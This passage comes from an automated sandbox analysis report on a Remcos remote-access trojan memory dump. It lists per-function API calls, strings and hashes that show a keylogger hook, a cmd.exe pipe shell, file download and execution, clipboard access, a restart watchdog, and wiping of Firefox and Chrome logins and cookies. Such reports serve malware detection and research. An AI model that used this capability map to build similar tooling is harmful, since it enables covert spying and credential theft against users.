CloseHandle.KERNEL32(00000000), ref: 00410BBA
CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F

Strings

\system32\, xrefs: 00410C6E
WinDir, xrefs: 00410C80, 00410CD5
WDH, xrefs: 00410C1A, 00410C20, 00410E85
svchost.exe, xrefs: 00410D2A
Watchdog module activated, xrefs: 00410BE9, 00410E41
(#G, xrefs: 00410B98
\SysWOW64\, xrefs: 00410CC6
!G, xrefs: 00410C47
Remcos restarted by watchdog!, xrefs: 00410BC5
rmclient.exe, xrefs: 00410D4F
fsutil.exe, xrefs: 00410D74
Watchdog launch failed!, xrefs: 00410DE8

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
API String ID: 3018269243-1736093966
Opcode ID: 663b53c9886a84878b2c7f244d1e88e20c598910774a7e7b077661fc57b6424a
Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
Opcode Fuzzy Hash: 663b53c9886a84878b2c7f244d1e88e20c598910774a7e7b077661fc57b6424a
Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F

Function 00406D28 Relevance: 32.3, APIs: 9, Strings: 9, Instructions: 810fileCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00406D4A
GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
DeleteFileW.KERNEL32(00000000), ref: 00406E3A

Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A076
Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0A6
Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0FB
Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A15C
Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A163

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B27
Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00471E90,?,?,?,?,?,?,0040545D), ref: 00404B55

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
DeleteFileA.KERNEL32(?), ref: 0040768E

Strings

Downloaded file: , xrefs: 004070BF
Downloading file: , xrefs: 0040700E
Executing file: , xrefs: 0040723E
Browsing directory: , xrefs: 004072C9
Unable to rename file!, xrefs: 004074A4
open, xrefs: 00407222
Deleted file: , xrefs: 00406E59
Failed to download file: , xrefs: 00407136
Unable to delete: , xrefs: 00406E98

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
API String ID: 1385304114-1507758755
Opcode ID: c278ba482b9b12ba4cb3465885cb620193a7144f06c216f2c0bcdf15f2f3753d
Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
Opcode Fuzzy Hash: c278ba482b9b12ba4cb3465885cb620193a7144f06c216f2c0bcdf15f2f3753d
Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B

Function 0040567A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004056C6

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

__Init_thread_footer.LIBCMT ref: 00405703
CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9

Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B

WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
TerminateProcess.KERNEL32(00000000), ref: 004059F7
CloseHandle.KERNEL32 ref: 00405A03
CloseHandle.KERNEL32 ref: 00405A0B
CloseHandle.KERNEL32 ref: 00405A1D
CloseHandle.KERNEL32 ref: 00405A25

Strings

cmd.exe, xrefs: 0040572D
SystemDrive, xrefs: 00405741

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: SystemDrive$cmd.exe
API String ID: 2994406822-3633465311
Opcode ID: 203e44911a43dcd92d82ef9baefe2184337315f49ac2ee985c3da8590b249be6
Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
Opcode Fuzzy Hash: 203e44911a43dcd92d82ef9baefe2184337315f49ac2ee985c3da8590b249be6
Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E

Function 0040AA71 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
FindClose.KERNEL32(00000000), ref: 0040AB0A
FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
FindClose.KERNEL32(00000000), ref: 0040AC53

Strings

\key3.db, xrefs: 0040ABB7
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040AA93
[Firefox StoredLogins Cleared!], xrefs: 0040AC40
[Firefox StoredLogins not found], xrefs: 0040AB15
\logins.json, xrefs: 0040AB75
UserProfile, xrefs: 0040AAA1

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: c4a8a3561dda33a316002e905d5158176c4bb62f60b9ed2c5276f134ba47fa8b
Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
Opcode Fuzzy Hash: c4a8a3561dda33a316002e905d5158176c4bb62f60b9ed2c5276f134ba47fa8b
Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A

Function 0040AC78 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
FindClose.KERNEL32(00000000), ref: 0040AD0A
FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
FindClose.KERNEL32(00000000), ref: 0040ADF0
FindClose.KERNEL32(00000000), ref: 0040AE11

Strings

\cookies.sqlite, xrefs: 0040AD6D
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040AC93
[Firefox cookies found, cleared!], xrefs: 0040AE20
[Firefox Cookies not found], xrefs: 0040AD15, 0040ADDD
UserProfile, xrefs: 0040ACA1

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: 3b5b8b69b03ca4378a7fc1b44b4c034fda2df619af0ad02dc3fa9ed3aead64ba
Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
Opcode Fuzzy Hash: 3b5b8b69b03ca4378a7fc1b44b4c034fda2df619af0ad02dc3fa9ed3aead64ba
Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E

Function 0041A01B Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A076
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0A6
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00472200,00000001), ref: 0041A118
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A125

Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0FB

GetLastError.KERNEL32(?,?,?,?,?,?,00472200,00000001), ref: 0041A146
FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A15C
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A163
FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A16C

Strings

05ou`ou, xrefs: 0041A118
pth_unenc, xrefs: 0041A01B

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID: 05ou`ou$pth_unenc
API String ID: 2341273852-1753207049
Opcode ID: 6646849479acfbb23c7f6e30dece2f39408b91799c0e2f504d1e8212b579ce47
Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
Opcode Fuzzy Hash: 6646849479acfbb23c7f6e30dece2f39408b91799c0e2f504d1e8212b579ce47
Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19

Function 00414EC1 Relevance: 18.1, APIs: 12, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00414EC2
EmptyClipboard.USER32 ref: 00414ED0
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
GlobalLock.KERNEL32(00000000), ref: 00414EF9
GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
CloseClipboard.USER32 ref: 00414F55
OpenClipboard.USER32 ref: 00414F5C
GetClipboardData.USER32(0000000D), ref: 00414F6C
GlobalLock.KERNEL32(00000000), ref: 00414F75
GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
CloseClipboard.USER32 ref: 00414F84

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID:
API String ID: 3520204547-0
Opcode ID: 3e1616ad11adebc6658c68cf8d8c69f9fd655134579bc9701aa075f92177f950
Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
Opcode Fuzzy Hash: 3e1616ad11adebc6658c68cf8d8c69f9fd655134579bc9701aa075f92177f950
Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A

Function 004175E1 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 204COMMON

Download Yara Rule

Strings

6, xrefs: 004177CB
2, xrefs: 004176AC
0, xrefs: 0041760B
3, xrefs: 0041770C
4, xrefs: 00417770
7, xrefs: 004177E2
1, xrefs: 0041764D
5, xrefs: 004177C1

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7
API String ID: 0-3177665633
Opcode ID: 05f2545c527969495595f266b9e9e19f26da2af4dc4ec233c9d36f06689b886f
Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
Opcode Fuzzy Hash: 05f2545c527969495595f266b9e9e19f26da2af4dc4ec233c9d36f06689b886f
Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6

Function 004186FE Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
GetLastError.KERNEL32 ref: 00418771
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 567a02d3676939b60cead921024e5a933565feb35c1b84cad879b30dce2cf72b
Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
Opcode Fuzzy Hash: 567a02d3676939b60cead921024e5a933565feb35c1b84cad879b30dce2cf72b
Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A

Function 048F9496 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 048F94AC
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 048F94FB
GetLastError.KERNEL32 ref: 048F9509
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 048F9541

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 049e9c4a4994cd58cca1601baf77f2d4cdbca623a01cdd536f5bac171392d326
Instruction ID: b6aeafb508a3f45204c883f4dc95de394636e9c1784cfd3edbdaedaf90c31478
Opcode Fuzzy Hash: 049e9c4a4994cd58cca1601baf77f2d4cdbca623a01cdd536f5bac171392d326
Instruction Fuzzy Hash: A2816D71504345ABD304EF26C894DAFB7A8EF95618F504E2DF98583190EFB4FA09CB52

Function 0040B28E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
FindClose.KERNEL32(00000000), ref: 0040B3BE
FindClose.KERNEL32(00000000), ref: 0040B3E9

Strings

\cookies.sqlite, xrefs: 0040B34A
AppData, xrefs: 0040B299
\Mozilla\Firefox\Profiles\, xrefs: 0040B2AF

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 1164774033-405221262
Opcode ID: 0a9536b98050fe6475af2145f6314896d627c54caaf148ea488075094c15e0f3
Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
Opcode Fuzzy Hash: 0a9536b98050fe6475af2145f6314896d627c54caaf148ea488075094c15e0f3
Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D

Function 00409340 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
GetLastError.KERNEL32 ref: 00409375

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
TranslateMessage.USER32(?), ref: 004093D2
DispatchMessageA.USER32(?), ref: 004093DD

Strings

Keylogger initialization failure: error , xrefs: 00409389
`ou, xrefs: 0040935B

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error $`ou
API String ID: 3219506041-93350570
Opcode ID: fdc0b474fe1aff0b22fd9a46203375ee37c9d39229ef2232f764eb0bd3d466e4
Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
Opcode Fuzzy Hash: fdc0b474fe1aff0b22fd9a46203375ee37c9d39229ef2232f764eb0bd3d466e4
Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A

Function 048E9538 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 048E953D
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 048E95B5
FindNextFileW.KERNEL32(00000000,?), ref: 048E95DE
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 048E95F5

Strings

OE, xrefs: 048E9538
p2oup3ou 2ou, xrefs: 048E95DE

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID: p2oup3ou 2ou$OE
API String ID: 1157919129-1943713240
Opcode ID: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
Instruction ID: 7db7a6cd3d58ef240dc0925299ef3042fae777b3e96e06a880db5949ff96f4e6
Opcode Fuzzy Hash: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
Instruction Fuzzy Hash: B78181729001199BDB15FBAACC509FD7778AF16218F104BAAD806E70A0EFB47B49CB51

Function 004128E3 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 485registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
GetProcAddress.KERNEL32(00000000), ref: 00412CC1

Strings

Shlwapi.dll, xrefs: 00412CB5
SHDeleteKeyW, xrefs: 00412CB0

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: f82792b3401e08ff186b5e00bd96b5b3681df82aef6ecc181a20678d603cf078
Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
Opcode Fuzzy Hash: f82792b3401e08ff186b5e00bd96b5b3681df82aef6ecc181a20678d603cf078
Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A

Function 004466BF Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00446741
_free.LIBCMT ref: 00446765
_free.LIBCMT ref: 004468EC
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
_free.LIBCMT ref: 00446AB8

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: a5da58bbeb6be53a23860ab05d43a3c9aafa13e1177cfd3d02c48c8adf0a5ff3
Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
Opcode Fuzzy Hash: a5da58bbeb6be53a23860ab05d43a3c9aafa13e1177cfd3d02c48c8adf0a5ff3
Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E

Function 048E85E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 048E85E5
FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 048E869E
__CxxThrowException@8.LIBVCRUNTIME ref: 048E86C6
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 048E86D3
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 048E87E9

Strings

p2oup3ou 2ou, xrefs: 048E86D3

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID: p2oup3ou 2ou
API String ID: 1771804793-232651861
Opcode ID: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
Instruction ID: 14fc2bdeb9e186a64a7bfff88fcdea73e54e7e7ccdcd372db98b0f676ae34473
Opcode Fuzzy Hash: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
Instruction Fuzzy Hash: 3751C331D00149ABDB04FB6ADD559FD777CAF12248F504B59E806E30A0EFB4BB498B82

Function 0040A953 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
GetLastError.KERNEL32 ref: 0040A999

Strings

[Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
[Chrome StoredLogins not found], xrefs: 0040A9B3
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
UserProfile, xrefs: 0040A95F

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: e2dc748f8a2f2c202dc5dfde2945bc6c5171a76981be289e4bc3f19e588866b0
Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
Opcode Fuzzy Hash: e2dc748f8a2f2c202dc5dfde2945bc6c5171a76981be289e4bc3f19e588866b0
Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF

Function 00415C90 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
GetLastError.KERNEL32 ref: 00415CDB

Strings

SeShutdownPrivilege, xrefs: 00415CB0

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5

Function 0040838E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408393

Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

__CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC

Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
Part of subcall function 00404E06: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C

FindClose.KERNEL32(00000000), ref: 004086F4

